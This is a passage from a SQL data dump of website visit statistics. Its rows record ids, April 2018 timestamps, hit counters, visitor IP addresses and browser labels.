25,1522829507,2,2,0,0,'91.196.178.83','chrome'),(229126,1522829643,1,1,0,0,'54.36.148.68','other'),(229127,1522829799,1,1,0,0,'216.244.66.194','other'),(229128,1522829827,1,1,0,0,'54.36.148.36','other'),(229129,1522829851,1,1,0,0,'37.73.246.145','other'),(229130,1522829888,1,1,0,0,'34.239.207.205','other'),(229131,1522830273,1,1,0,0,'54.36.148.251','other'),(229132,1522830340,1,1,0,0,'91.196.178.68','firefox'),(229133,1522830347,1,1,0,0,'54.36.148.226','other'),(229134,1522830422,1,1,0,0,'216.244.66.237','other'),(229135,1522830521,1,1,0,0,'91.124.182.170','firefox'),(229136,1522830570,1,1,0,0,'54.36.148.80','other'),(229137,1522830813,1,1,0,0,'34.239.207.205','other'),(229138,1522831542,1,1,0,0,'54.36.148.171','other'),(229139,1522831558,1,1,0,0,'91.196.178.86','chrome'),(229140,1522831727,1,1,0,0,'34.239.207.205','other'),(229141,1522831778,1,1,0,0,'54.36.148.221','other'),(229142,1522831806,1,1,0,0,'54.36.149.77','other'),(229143,1522832132,1,1,0,0,'8.29.198.26','other'),(229144,1522832218,1,1,0,0,'54.36.149.80','other'),(229145,1522832260,1,1,0,0,'91.124.182.170','firefox'),(229146,1522832583,1,1,0,0,'54.36.149.2','other'),(229147,1522832618,1,1,0,0,'54.36.149.97','other'),(229148,1522832639,1,1,0,0,'34.239.207.205','other'),(229149,1522832704,1,1,0,0,'54.36.148.47','other'),(229150,1522832939,1,1,0,0,'54.36.148.169','other'),(229151,1522832971,1,1,0,0,'188.247.105.43','chrome'),(229152,1522833163,1,1,0,0,'91.124.182.170','firefox'),(229153,1522833256,1,1,0,0,'54.36.148.224','other'),(229154,1522833379,1,1,0,0,'216.244.66.237','other'),(229155,1522833558,1,1,0,0,'34.239.207.205','other'),(229156,1522833794,1,1,0,0,'54.36.148.109','other'),(229157,1522833839,1,1,0,0,'216.244.66.194','other'),(229158,1522834015,2,2,0,0,'178.154.171.88','other'),(229159,1522834199,1,0,1,0,'66.249.66.157',''),(229160,1522834221,1,1,0,0,'54.36.148.200','other'),(229161,1522834474,1,1,0,0,'34.239.207.205','other'),(229162,1522834552,1,1,0,0,'54.36.148.167','other'),(229163,1522834559,1,1,0,0,'54.36.148.210','other'),(229164,1522834672,2,2,0,0,'216.244.66.237','other'),(229165,1522835000,1,1,0,0,'54.36.149.80','other'),(229166,1522835006,1,1,0,0,'77.41.90.202','msie'),(229167,1522835157,1,1,0,0,'54.36.148.143','other'),(229168,1522835220,1,1,0,0,'95.134.46.246','chrome'),(229169,1522835283,1,1,0,0,'54.36.148.158','other'),(229170,1522835388,1,1,0,0,'34.239.207.205','other'),(229171,1522835933,1,1,0,0,'54.36.149.5','other'),(229172,1522835962,1,1,0,0,'54.36.148.248','other'),(229173,1522835985,1,1,0,0,'207.46.13.119','other'),(229174,1522836251,1,1,0,0,'217.65.244.65','chrome'),(229175,1522836264,1,1,0,0,'54.36.148.107','other'),(229176,1522836340,1,1,0,0,'34.239.207.205','other'),(229177,1522837046,1,0,1,0,'66.249.66.158',''),(229178,1522837258,1,1,0,0,'34.239.207.205','other'),(229179,1522837261,1,1,0,0,'54.36.148.148','other'),(229180,1522837348,1,1,0,0,'176.105.208.74','chrome'),(229181,1522837454,1,1,0,0,'54.36.148.13','other'),(229182,1522837607,1,1,0,0,'141.8.142.74','other'),(229183,1522837685,1,1,0,0,'54.36.148.232','other'),(229184,1522837833,1,1,0,0,'54.36.149.50','other'),(229185,1522837839,1,1,0,0,'54.36.149.25','other'),(229186,1522837864,1,1,0,0,'54.36.149.30','other'),(229187,1522838174,1,1,0,0,'54.36.149.5','other'),(229188,1522838184,1,1,0,0,'34.239.207.205','other'),(229189,1522838581,1,0,1,0,'66.249.66.199',''),(229190,1522838583,1,1,0,0,'178.154.171.88','other'),(229191,1522838718,1,1,0,0,'54.36.149.63','other'),(229192,1522838763,1,1,0,0,'54.36.148.15','other'),(229193,1522838862,1,1,0,0,'54.36.148.219','other'),(229194,1522839113,1,1,0,0,'34.239.207.205','other'),(229195,1522839147,1,1,0,0,'54.36.148.147','other'),(229196,1522839240,1,1,0,0,'54.36.149.0','other'),(229197,1522839273,2,2,0,0,'91.196.178.18','chrome'),(229198,1522839914,1,1,0,0,'54.36.149.60','other'),(229199,1522839921,1,1,0,0,'54.36.148.47','other'),(229200,1522840020,1,1,0,0,'34.239.207.205','other'),(229201,1522840101,1,1,0,0,'178.154.171.88','other'),(229202,1522840131,1,1,0,0,'54.36.148.239','other'),(229203,1522840212,1,1,0,0,'54.36.149.10','other'),(229204,1522840339,3,3,0,0,'130.180.217.53','chrome'),(229205,1522840707,1,1,0,0,'54.36.148.163','other'),(229206,1522840729,1,1,0,0,'66.102.9.38','chrome'),(229207,1522840734,1,1,0,0,'217.66.156.105','chrome'),(229208,1522840812,1,1,0,0,'54.36.148.253','other'),(229209,1522840837,1,1,0,0,'66.102.9.35','chrome'),(229210,1522840908,1,1,0,0,'95.132.34.209','firefox'),(229211,1522840947,1,1,0,0,'34.239.207.205','other'),(229212,1522840971,2,2,0,0,'95.134.97.244','chrome'),(229213,1522841099,1,1,0,0,'54.36.148.249','other'),(229214,1522841138,2,2,0,0,'91.196.178.18','chrome'),(229215,1522841262,2,2,0,0,'91.196.178.83','chrome'),(229216,1522841355,1,1,0,0,'54.36.149.39','other'),(229217,1522841592,1,1,0,0,'54.36.148.62','other'),(229218,1522841639,1,1,0,0,'54.36.148.43','other'),(229219,1522841739,1,1,0,0,'180.76.15.135','other'),(229220,1522841815,1,1,0,0,'54.36.148.175','other'),(229221,1522841899,1,1,0,0,'34.239.207.205','other'),(229222,1522841930,1,1,0,0,'54.36.148.34','other'),(229223,1522841996,1,1,0,0,'54.36.148.194','other'),(229224,1522842270,1,1,0,0,'54.36.148.77','other'),(229225,1522842455,2,2,0,0,'91.196.178.88','chrome'),(229226,1522842566,1,1,0,0,'216.244.66.237','other'),(229227,1522842581,1,1,0,0,'178.154.171.88','other'),(229228,1522842630,1,1,0,0,'54.36.149.16','other'),(229229,1522842816,1,1,0,0,'34.239.207.205','other'),(229230,1522842925,1,1,0,0,'54.36.148.22','other'),(229231,1522842982,1,1,0,0,'8.29.198.27','other'),(229232,1522842994,2,2,0,0,'91.196.178.83','chrome'),(229233,1522843039,1,1,0,0,'46.98.91.175','opera'),(229234,1522843217,1,1,0,0,'54.36.148.50','other'),(229235,1522843558,1,1,0,0,'54.36.148.125','other'),(229236,1522843656,1,1,0,0,'54.36.149.4','other'),(229237,1522843725,1,1,0,0,'34.239.207.205','other'),(229238,1522843748,1,1,0,0,'54.36.148.251','other'),(229239,1522843796,1,1,0,0,'40.77.167.194','other'),(229240,1522843816,1,1,0,0,'54.36.148.193','other'),(229241,1522844021,1,1,0,0,'178.154.171.88','other'),(229242,1522844046,1,1,0,0,'54.36.148.192','other'),(229243,1522844208,1,1,0,0,'54.36.148.30','other'),(229244,1522844648,1,1,0,0,'34.239.207.205','other'),(229245,1522844726,1,1,0,0,'207.46.13.212','other'),(229246,1522844839,1,1,0,0,'91.124.182.170','firefox'),(229247,1522845160,1,1,0,0,'54.36.148.185','other'),(229248,1522845360,1,1,0,0,'54.36.149.62','other'),(229249,1522845391,1,1,0,0,'54.36.148.252','other'),(229250,1522845467,1,1,0,0,'91.195.75.3','firefox'),(229251,1522845578,1,1,0,0,'34.239.207.205','other'),(229252,1522845853,1,1,0,0,'54.36.149.52','other'),(229253,1522845948,1,1,0,0,'54.36.149.44','other'),(229254,1522846073,1,0,1,0,'66.249.66.156',''),(229255,1522846442,1,1,0,0,'54.36.148.90','other'),(229256,1522846485,1,1,0,0,'159.224.220.15','firefox'),(229257,1522846494,1,1,0,0,'54.36.148.77','other'),(229258,1522846505,1,1,0,0,'34.239.207.205','other'),(229259,1522846910,1,1,0,0,'54.36.148.54','other'),(229260,1522847135,1,1,0,0,'66.249.66.158','chrome'),(229261,1522847137,1,1,0,0,'91.196.178.133','firefox'),(229262,1522847191,1,1,0,0,'54.36.148.201','other'),(229263,1522847201,2,2,0,0,'91.196.178.83','chrome'),(229264,1522847328,1,1,0,0,'54.36.149.82','other'),(229265,1522847393,1,1,0,0,'207.46.13.136','other'),(229266,1522847421,1,1,0,0,'34.239.207.205','other'),(229267,1522847981,1,1,0,0,'216.244.66.246','other'),(229268,1522848064,1,1,0,0,'54.36.148.52','other'),(229269,1522848146,1,1,0,0,'176.105.208.74','chrome'),(229270,1522848180,1,1,0,0,'54.36.148.154','other'),(229271,1522848252,2,2,0,0,'91.196.178.167','chrome'),(229272,1522848253,1,1,0,0,'54.36.149.52','other'),(229273,1522848309,1,1,0,0,'54.36.148.138','other'),(229274,1522848331,1,1,0,0,'34.239.207.205','other'),(229275,1522848481,1,1,0,0,'54.36.148.202','other'),(229276,1522848498,1,1,0,0,'54.36.148.242','other'),(229277,1522848875,1,1,0,0,'193.16.101.106','chrome'),(229278,1522848900,1,1,0,0,'54.36.148.13','other'),(229279,1522848972,1,1,0,0,'178.154.171.88','other'),(229280,1522849038,1,1,0,0,'54.36.148.22','other'),(229281,1522849252,1,1,0,0,'34.239.207.205','other'),(229282,1522849451,1,1,0,0,'54.36.148.106','other'),(229283,1522849575,1,1,0,0,'54.36.148.79','other'),(229284,1522849654,1,1,0,0,'54.36.148.92','other'),(229285,1522849878,1,1,0,0,'91.196.178.88','firefox'),(229286,1522849989,1,1,0,0,'54.36.148.21','other'),(229287,1522850130,1,1,0,0,'54.36.148.244','other'),(229288,1522850335,1,1,0,0,'34.239.207.205','other'),(229289,1522850387,1,1,0,0,'54.36.148.186','other'),(229290,1522850561,1,1,0,0,'54.36.148.151','other'),(229291,1522850653,1,1,0,0,'54.36.149.67','other'),(229292,1522850767,1,1,0,0,'54.36.148.152','other'),(229293,1522850878,1,1,0,0,'54.36.149.42','other'),(229294,1522850938,2,2,0,0,'216.244.66.237','other'),(229295,1522851119,1,1,0,0,'54.36.149.38','other'),(229296,1522851245,1,1,0,0,'34.239.207.205','other'),(229297,1522851247,1,1,0,0,'54.36.148.136','other'),(229298,1522851266,1,1,0,0,'54.36.149.6','other'),(229299,1522851393,1,1,0,0,'54.36.148.201','other'),(229300,1522851539,1,0,1,0,'66.249.66.158',''),(229301,1522851542,1,1,0,0,'37.9.113.101','other'),(229302,1522851599,1,1,0,0,'54.36.148.216','other'),(229303,1522851921,2,2,0,0,'141.8.142.74','other'),(229304,1522852036,1,1,0,0,'54.36.148.127','other'),(229305,1522852061,1,1,0,0,'54.36.148.75','other'),(229306,1522853381,1,1,0,0,'54.36.148.244','other'),(229307,1522853823,1,1,0,0,'8.29.198.27','other'),(229308,1522854122,1,1,0,0,'207.46.13.217','other'),(229309,1522854271,1,1,0,0,'54.36.148.81','other'),(229310,1522854332,1,1,0,0,'207.46.13.136','other'),(229311,1522854401,1,1,0,0,'54.36.149.95','other'),(229312,1522854455,1,1,0,0,'54.36.148.96','other'),(229313,1522854581,1,1,0,0,'54.36.148.94','other'),(229314,1522854785,1,1,0,0,'54.36.148.66','other'),(229315,1522855396,1,1,0,0,'188.230.43.254','other'),(229316,1522855576,1,1,0,0,'54.36.149.63','other'),(229317,1522855750,1,1,0,0,'54.36.148.112','other'),(229318,1522855803,1,0,1,0,'66.249.66.195',''),(229319,1522856011,2,2,0,0,'141.8.142.74','other'),(229320,1522856013,1,0,1,0,'66.249.66.201',''),(229321,1522856050,1,1,0,0,'54.36.148.205','other'),(229322,1522856275,1,1,0,0,'54.36.149.60','other'),(229323,1522856410,1,1,0,0,'66.249.66.201','chrome'),(229324,1522856434,1,1,0,0,'54.36.148.78','other'),(229325,1522856622,1,1,0,0,'54.36.148.22','other'),(229326,1522856630,1,1,0,0,'54.36.148.88','other'),(229327,1522856716,1,1,0,0,'54.36.149.51','other'),(229328,1522856719,1,1,0,0,'54.36.148.175','other'),(229329,1522856892,1,1,0,0,'54.36.148.100','other'),(229330,1522856901,1,1,0,0,'54.36.148.119','other'),(229331,1522856962,1,1,0,0,'54.36.148.25','other'),(229332,1522857123,1,1,0,0,'54.36.148.189','other'),(229333,1522857206,1,1,0,0,'188.230.43.254','other'),(229334,1522857242,1,1,0,0,'54.36.148.142','other'),(229335,1522857263,1,1,0,0,'54.36.149.17','other'),(229336,1522857299,1,1,0,0,'54.36.148.103','other'),(229337,1522857429,1,1,0,0,'37.9.113.80','other'),(229338,1522857596,1,1,0,0,'54.36.148.200','other'),(229339,1522857702,1,1,0,0,'54.36.148.18','other'),(229340,1522857769,1,1,0,0,'37.9.113.134','other'),(229341,1522858213,1,1,0,0,'54.36.149.103','other'),(229342,1522858398,1,1,0,0,'54.36.148.147','other'),(229343,1522858437,1,1,0,0,'54.36.148.234','other'),(229344,1522859531,1,1,0,0,'54.36.148.126','other'),(229345,1522859580,1,1,0,0,'188.230.43.254','other'),(229346,1522859957,1,1,0,0,'54.36.148.48','other'),(229347,1522860213,1,1,0,0,'54.36.149.26','other'),(229348,1522860303,1,1,0,0,'54.36.149.50','other'),(229349,1522860466,1,0,1,0,'66.249.66.158',''),(229350,1522860614,1,1,0,0,'54.36.148.16','other'),(229351,1522860853,1,1,0,0,'54.36.149.86','other'),(229352,1522861094,1,1,0,0,'54.36.149.73','other'),(229353,1522861115,1,1,0,0,'54.36.148.239','other'),(229354,1522861353,1,1,0,0,'165.254.222.44','other'),(229355,1522861464,1,0,1,0,'66.249.66.195',''),(229356,1522862030,1,1,0,0,'188.230.43.254','other'),(229357,1522862093,1,1,0,0,'216.244.66.237','other'),(229358,1522862267,1,1,0,0,'54.36.148.12','other'),(229359,1522862274,2,2,0,0,'141.8.142.74','other'),(229360,1522862522,1,1,0,0,'54.36.148.80','other'),(229361,1522862605,1,1,0,0,'54.36.148.138','other'),(229362,1522862955,1,1,0,0,'54.36.148.240','other'),(229363,1522863248,1,0,1,0,'66.249.66.195',''),(229364,1522863458,2,2,0,0,'54.36.148.199','other'),(229365,1522863620,1,1,0,0,'54.36.148.177','other'),(229366,1522863742,1,1,0,0,'54.36.148.115','other'),(229367,1522863822,1,1,0,0,'40.77.167.57','other'),(229368,1522863888,1,1,0,0,'66.249.66.158','chrome'),(229369,1522864036,1,1,0,0,'54.36.148.208','other'),(229370,1522864268,1,1,0,0,'54.36.148.49','other'),(229371,1522864379,1,1,0,0,'188.230.43.254','other'),(229372,1522864399,1,1,0,0,'54.36.149.101','other'),(229373,1522864456,1,1,0,0,'216.244.66.194','other'),(229374,1522864531,3,3,0,0,'37.54.18.215','chrome'),(229375,1522864609,1,1,0,0,'54.36.149.105','other'),(229376,1522864683,1,1,0,0,'8.29.198.25','other'),(229377,1522864800,1,1,0,0,'91.196.178.88','firefox'),(229378,1522864854,1,0,1,0,'66.249.66.158',''),(229379,1522864930,1,1,0,0,'54.36.149.64','other'),(229380,1522864955,1,1,0,0,'216.244.66.237','other'),(229381,1522864976,1,1,0,0,'54.36.148.101','other'),(229382,1522865142,1,1,0,0,'54.36.148.238','other'),(229383,1522865175,1,1,0,0,'54.36.148.242','other'),(229384,1522865441,1,1,0,0,'207.244.149.75','chrome'),(229385,1522865611,1,1,0,0,'54.36.149.93','other'),(229386,1522865759,1,1,0,0,'54.36.149.58','other'),(229387,1522865956,1,1,0,0,'54.36.149.33','other'),(229388,1522866206,1,1,0,0,'54.36.149.12','other'),(229389,1522866421,1,1,0,0,'52.86.29.142','other'),(229390,1522866696,1,1,0,0,'54.36.148.91','other'),(229391,1522866777,1,1,0,0,'188.230.43.254','other'),(229392,1522866831,1,1,0,0,'54.36.148.255','other'),(229393,1522867179,1,1,0,0,'37.54.19.62','chrome'),(229394,1522867335,1,1,0,0,'52.86.29.142','other'),(229395,1522867429,1,1,0,0,'54.36.149.96','other'),(229396,1522867451,1,1,0,0,'54.36.148.175','other'),(229397,1522867468,1,1,0,0,'54.36.149.46','other'),(229398,1522867633,1,1,0,0,'54.36.148.227','other'),(229399,1522867655,1,1,0,0,'54.36.149.34','other'),(229400,1522867976,1,1,0,0,'54.36.148.178','other'),(229401,1522868256,1,1,0,0,'52.86.29.142','other'),(229402,1522868322,1,1,0,0,'54.36.149.53','other'),(229403,1522868654,1,1,0,0,'54.36.149.75','other'),(229404,1522868840,1,1,0,0,'54.36.148.17','other'),(229405,1522869005,1,1,0,0,'54.36.148.55','other'),(229406,1522869159,1,1,0,0,'52.86.29.142','other'),(229407,1522869182,1,1,0,0,'188.230.43.254','other'),(229408,1522869188,1,1,0,0,'54.36.148.84','other'),(229409,1522869307,1,1,0,0,'54.36.148.164','other'),(229410,1522869378,1,1,0,0,'54.36.148.153','other'),(229411,1522869438,1,1,0,0,'54.36.149.32','other'),(229412,1522869459,1,1,0,0,'54.36.148.38','other'),(229413,1522869505,2,2,0,0,'91.196.178.163','chrome'),(229414,1522869536,1,1,0,0,'54.36.148.13','other'),(229415,1522869562,1,1,0,0,'54.36.149.40','other'),(229416,1522869601,1,1,0,0,'54.36.148.162','other'),(229417,1522869603,1,1,0,0,'216.244.66.237','other'),(229418,1522869647,1,1,0,0,'54.36.148.141','other'),(229419,1522869716,1,1,0,0,'178.92.8.121','chrome'),(229420,1522869845,1,1,0,0,'54.36.148.29','other'),(229421,1522869900,1,1,0,0,'54.36.149.60','other'),(229422,1522869979,1,1,0,0,'54.36.149.8','other'),(229423,1522870056,1,1,0,0,'54.36.148.193','other'),(229424,1522870085,1,1,0,0,'52.86.29.142','other'),(229425,1522870152,1,1,0,0,'54.36.149.106','other'),(229426,1522870204,1,1,0,0,'54.36.148.133','other'),(229427,1522870249,1,1,0,0,'54.36.148.89','other'),(229428,1522870594,1,1,0,0,'54.36.148.189','other'),(229429,1522870625,1,1,0,0,'54.36.148.91','other'),(229430,1522870719,1,1,0,0,'46.211.26.15','other'),(229431,1522870861,1,1,0,0,'54.36.148.105','other'),(229432,1522870887,1,1,0,0,'54.36.149.12','other'),(229433,1522870987,1,1,0,0,'52.86.29.142','other'),(229434,1522871049,1,1,0,0,'54.36.148.20','other'),(229435,1522871052,1,1,0,0,'54.36.148.11','other'),(229436,1522871338,1,1,0,0,'54.36.149.46','other'),(229437,1522871466,1,1,0,0,'54.36.148.77','other'),(229438,1522871545,1,1,0,0,'54.36.149.19','other'),(229439,1522871580,1,1,0,0,'188.230.43.254','other'),(229440,1522871753,1,1,0,0,'87.250.224.85','other'),(229441,1522871861,1,1,0,0,'5.45.207.83','other'),(229442,1522871889,1,1,0,0,'52.86.29.142','other'),(229443,1522872397,1,1,0,0,'54.36.149.10','other'),(229444,1522872570,2,2,0,0,'54.36.148.30','other'),(229445,1522872758,1,1,0,0,'54.36.148.213','other'),(229446,1522872791,1,1,0,0,'52.86.29.142','other'),(229447,1522873134,1,1,0,0,'141.8.142.74','other'),(229448,1522873175,1,1,0,0,'54.36.148.192','other'),(229449,1522873186,1,0,1,0,'66.249.66.195',''),(229450,1522873694,1,1,0,0,'52.86.29.142','other'),(229451,1522873976,1,1,0,0,'188.230.43.254','other'),(229452,1522874026,1,1,0,0,'54.36.149.82','other'),(229453,1522874253,1,1,0,0,'54.36.149.72','other'),(229454,1522874385,1,1,0,0,'54.36.149.66','other'),(229455,1522874426,1,1,0,0,'141.8.142.74','other'),(229456,1522874677,1,1,0,0,'52.86.29.142','other'),(229457,1522874864,1,1,0,0,'54.36.149.93','other'),(229458,1522874975,1,1,0,0,'54.36.148.194','other'),(229459,1522875323,1,1,0,0,'104.131.84.184','other'),(229460,1522875433,1,1,0,0,'54.36.148.181','other'),(229461,1522875534,1,1,0,0,'8.29.198.26','other'),(229462,1522875585,1,1,0,0,'52.86.29.142','other'),(229463,1522875727,1,1,0,0,'54.36.149.74','other'),(229464,1522875900,1,1,0,0,'54.36.149.9','other'),(229465,1522875924,1,1,0,0,'216.244.66.194','other'),(229466,1522876299,1,1,0,0,'54.36.148.91','other'),(229467,1522876498,1,1,0,0,'54.36.148.246','other'),(229468,1522876502,1,1,0,0,'54.36.148.32','other'),(229469,1522876504,1,1,0,0,'52.86.29.142','other'),(229470,1522876621,1,1,0,0,'54.36.149.95','other'),(229471,1522876794,1,1,0,0,'54.36.148.97','other'),(229472,1522877310,1,1,0,0,'54.36.148.109','other'),(229473,1522877386,1,1,0,0,'87.250.224.46','other'),(229474,1522877424,1,1,0,0,'52.86.29.142','other'),(229475,1522877500,1,1,0,0,'54.36.148.48','other'),(229476,1522877589,1,1,0,0,'178.154.171.88','other'),(229477,1522877702,1,1,0,0,'54.36.149.28','other'),(229478,1522877758,1,1,0,0,'93.188.39.163','firefox'),(229479,1522877979,1,1,0,0,'54.36.148.43','other'),(229480,1522878326,1,1,0,0,'52.86.29.142','other'),(229481,1522878424,1,1,0,0,'216.244.66.237','other'),(229482,1522878428,1,1,0,0,'54.36.149.94','other'),(229483,1522878437,1,1,0,0,'54.36.148.246','other'),(229484,1522878476,1,1,0,0,'54.36.148.78','other'),(229485,1522878550,1,1,0,0,'163.172.139.91','other'),(229486,1522878700,1,1,0,0,'54.36.148.93','other'),(229487,1522879033,1,1,0,0,'54.36.148.109','other'),(229488,1522879230,1,1,0,0,'23.92.127.10','other'),(229489,1522879603,1,1,0,0,'54.36.149.107','other'),(229490,1522879676,1,1,0,0,'54.36.148.24','other'),(229491,1522880402,1,1,0,0,'54.36.148.72','other'),(229492,1522880497,1,1,0,0,'54.36.149.87','other'),(229493,1522880542,1,1,0,0,'5.153.234.83','other'),(229494,1522880595,1,1,0,0,'54.36.149.83','other'),(229495,1522880735,1,1,0,0,'163.172.139.91','other'),(229496,1522880789,1,1,0,0,'54.36.149.106','other'),(229497,1522880837,1,1,0,0,'5.153.234.83','msie'),(229498,1522880848,1,1,0,0,'216.244.66.246','other'),(229499,1522880852,1,1,0,0,'54.36.148.24','other'),(229500,1522880963,1,1,0,0,'54.36.149.62','other'),(229501,1522881063,1,1,0,0,'54.36.149.33','other'),(229502,1522881280,1,1,0,0,'54.36.148.210','other'),(229503,1522881304,1,1,0,0,'54.36.148.18','other'),(229504,1522881361,1,1,0,0,'5.153.234.83','firefox'),(229505,1522881573,1,1,0,0,'185.225.208.21','other'),(229506,1522882011,1,1,0,0,'54.36.148.212','other'),(229507,1522882116,1,1,0,0,'163.172.139.91','other'),(229508,1522882138,1,1,0,0,'54.36.148.80','other'),(229509,1522882214,1,1,0,0,'54.36.148.198','other'),(229510,1522882387,1,1,0,0,'5.153.234.83','other'),(229511,1522882518,1,1,0,0,'34.207.222.239','other'),(229512,1522882548,1,1,0,0,'51.15.42.114','chrome'),(229513,1522882662,1,1,0,0,'196.52.10.26','other'),(229514,1522882699,1,1,0,0,'54.36.148.187','other'),(229515,1522882743,1,1,0,0,'207.46.13.184','other'),(229516,1522882845,1,0,1,0,'66.249.66.158',''),(229517,1522882938,1,1,0,0,'54.36.148.203','other'),(229518,1522883019,1,1,0,0,'54.36.148.221','other'),(229519,1522883053,1,1,0,0,'54.36.149.18','other'),(229520,1522883084,1,1,0,0,'196.52.10.26','firefox'),(229521,1522883186,1,1,0,0,'54.36.148.91','other'),(229522,1522883304,1,1,0,0,'54.36.149.58','other'),(229523,1522883364,2,2,0,0,'23.92.127.10','other'),(229524,1522883389,1,1,0,0,'23.92.127.10','chrome'),(229525,1522883417,2,2,0,0,'51.15.42.114','other'),(229526,1522883420,1,1,0,0,'23.92.127.10','msie'),(229527,1522883430,1,1,0,0,'23.92.127.10','firefox'),(229528,1522883782,1,1,0,0,'54.36.148.85','other'),(229529,1522883888,1,1,0,0,'54.36.149.10','other'),(229530,1522884042,1,1,0,0,'54.36.148.205','other'),(229531,1522884153,1,1,0,0,'185.225.208.38','chrome'),(229532,1522884205,1,1,0,0,'185.225.208.38','msie'),(229533,1522884208,1,1,0,0,'185.225.208.38','firefox'),(229534,1522884228,1,1,0,0,'185.225.208.38','other'),(229535,1522884386,1,1,0,0,'216.244.66.237','other'),(229536,1522884616,1,1,0,0,'54.36.148.14','other'),(229537,1522884845,1,1,0,0,'163.172.139.91','other'),(229538,1522885137,1,1,0,0,'54.36.148.234','other'),(229539,1522885304,1,1,0,0,'54.36.149.59','other'),(229540,1522885559,1,1,0,0,'54.36.148.23','other'),(229541,1522885831,1,1,0,0,'196.52.10.17','chrome'),(229542,1522886031,1,1,0,0,'54.36.148.179','other'),(229543,1522886055,1,1,0,0,'54.36.149.89','other'),(229544,1522886066,1,1,0,0,'54.36.148.196','other'),(229545,1522886084,1,1,0,0,'51.15.46.174','chrome'),(229546,1522886337,1,1,0,0,'54.36.148.82','other'),(229547,1522886342,1,1,0,0,'51.15.42.114','chrome'),(229548,1522886376,1,1,0,0,'8.29.198.27','other'),(229549,1522886549,1,1,0,0,'54.36.148.74','other'),(229550,1522886950,2,2,0,0,'216.244.66.237','other'),(229551,1522886974,1,1,0,0,'54.36.148.164','other'),(229552,1522887007,1,1,0,0,'207.46.13.184','other'),(229553,1522887374,1,1,0,0,'51.15.53.163','msie'),(229554,1522887400,1,1,0,0,'51.15.46.174','other'),(229555,1522887595,1,1,0,0,'185.225.208.21','chrome'),(229556,1522887616,1,1,0,0,'185.225.208.21','msie'),(229557,1522887666,1,1,0,0,'185.225.208.21','firefox'),(229558,1522887678,1,1,0,0,'54.36.148.222','other'),(229559,1522887727,1,1,0,0,'54.36.148.67','other'),(229560,1522887999,1,1,0,0,'180.76.15.7','other'),(229561,1522888109,1,1,0,0,'54.36.148.109','other'),(229562,1522888229,1,1,0,0,'178.154.171.88','other'),(229563,1522888303,1,1,0,0,'54.36.148.106','other'),(229564,1522888507,1,1,0,0,'54.36.148.103','other'),(229565,1522888571,1,1,0,0,'196.52.10.26','chrome'),(229566,1522888583,1,1,0,0,'51.15.46.174','other'),(229567,1522888593,1,1,0,0,'196.52.10.26','other'),(229568,1522888699,1,1,0,0,'141.8.142.74','other'),(229569,1522888749,1,1,0,0,'54.36.148.168','other'),(229570,1522888809,1,1,0,0,'157.55.39.250','other'),(229571,1522888835,1,1,0,0,'54.36.148.196','other'),(229572,1522888956,1,1,0,0,'54.36.149.81','other'),(229573,1522888968,1,1,0,0,'54.36.148.191','other'),(229574,1522889022,2,2,0,0,'23.92.127.34','chrome'),(229575,1522889034,1,1,0,0,'23.92.127.34','msie'),(229576,1522889121,1,1,0,0,'54.36.148.130','other'),(229577,1522889277,1,1,0,0,'103.208.220.139','chrome'),(229578,1522889326,1,1,0,0,'54.36.149.69','other'),(229579,1522889328,1,1,0,0,'51.15.46.174','chrome'),(229580,1522889486,2,2,0,0,'185.230.125.50','msie'),(229581,1522889650,2,2,0,0,'51.15.53.163','other'),(229582,1522889684,1,1,0,0,'54.36.149.63','other'),(229583,1522889780,1,1,0,0,'185.230.125.50','firefox'),(229584,1522890064,1,1,0,0,'54.36.148.160','other'),(229585,1522890067,1,1,0,0,'103.208.220.132','msie'),(229586,1522890160,1,1,0,0,'54.36.148.62','other'),(229587,1522890165,1,1,0,0,'5.153.234.147','msie'),(229588,1522890221,1,1,0,0,'5.153.234.147','firefox'),(229589,1522890261,1,1,0,0,'5.153.234.147','other'),(229590,1522890266,1,1,0,0,'54.36.148.239','other'),(229591,1522891041,3,3,0,0,'51.15.42.114','other'),(229592,1522891068,1,1,0,0,'5.153.234.147','msie'),(229593,1522891119,1,1,0,0,'54.36.148.76','other'),(229594,1522891304,3,3,0,0,'23.92.127.34','msie'),(229595,1522891318,1,1,0,0,'54.36.148.73','other'),(229596,1522891388,1,1,0,0,'23.92.127.34','other'),(229597,1522891450,1,1,0,0,'54.36.148.71','other'),(229598,1522891480,1,1,0,0,'178.154.171.88','other'),(229599,1522891595,1,1,0,0,'103.208.220.132','other'),(229600,1522891600,1,1,0,0,'54.36.148.117','other'),(229601,1522891603,2,2,0,0,'103.208.220.132','firefox'),(229602,1522891690,1,1,0,0,'54.36.148.123','other'),(229603,1522891697,1,1,0,0,'103.208.220.132','msie'),(229604,1522891844,1,1,0,0,'54.36.149.7','other'),(229605,1522891926,1,1,0,0,'141.8.142.74','other'),(229606,1522891975,1,1,0,0,'51.15.53.163','msie'),(229607,1522892106,1,1,0,0,'216.244.66.246','other'),(229608,1522892112,1,1,0,0,'54.36.148.244','other'),(229609,1522892247,1,1,0,0,'54.36.148.153','other'),(229610,1522892429,1,1,0,0,'54.36.148.113','other'),(229611,1522892505,1,1,0,0,'54.36.149.37','other'),(229612,1522892625,1,1,0,0,'54.36.148.202','other'),(229613,1522892830,1,1,0,0,'185.230.125.50','other'),(229614,1522892894,1,1,0,0,'185.230.125.50','msie'),(229615,1522893388,2,2,0,0,'82.102.24.169','other'),(229616,1522893397,1,1,0,0,'54.36.148.180','other'),(229617,1522893451,1,1,0,0,'91.209.11.236','other'),(229618,1522893599,1,1,0,0,'54.36.148.219','other'),(229619,1522893633,1,1,0,0,'54.36.148.216','other'),(229620,1522893649,1,1,0,0,'54.36.149.36','other'),(229621,1522893673,1,1,0,0,'54.36.149.71','other'),(229622,1522893792,1,1,0,0,'51.15.42.114','other'),(229623,1522894022,1,1,0,0,'54.36.148.117','other'),(229624,1522894139,1,1,0,0,'54.36.148.168','other'),(229625,1522894916,1,1,0,0,'54.36.149.53','other'),(229626,1522895050,1,1,0,0,'54.36.148.58','other'),(229627,1522895066,1,1,0,0,'54.36.148.138','other'),(229628,1522895210,1,1,0,0,'54.36.148.13','other'),(229629,1522895301,1,1,0,0,'54.36.148.228','other'),(229630,1522895582,1,1,0,0,'180.76.15.30','other'),(229631,1522895689,1,1,0,0,'176.193.121.224','firefox'),(229632,1522896386,1,1,0,0,'54.36.148.18','other'),(229633,1522896873,1,1,0,0,'54.36.148.204','other'),(229634,1522897224,1,1,0,0,'8.29.198.27','other'),(229635,1522897644,1,1,0,0,'141.8.142.74','other'),(229636,1522898192,1,1,0,0,'54.36.148.120','other'),(229637,1522898341,1,1,0,0,'54.36.149.26','other'),(22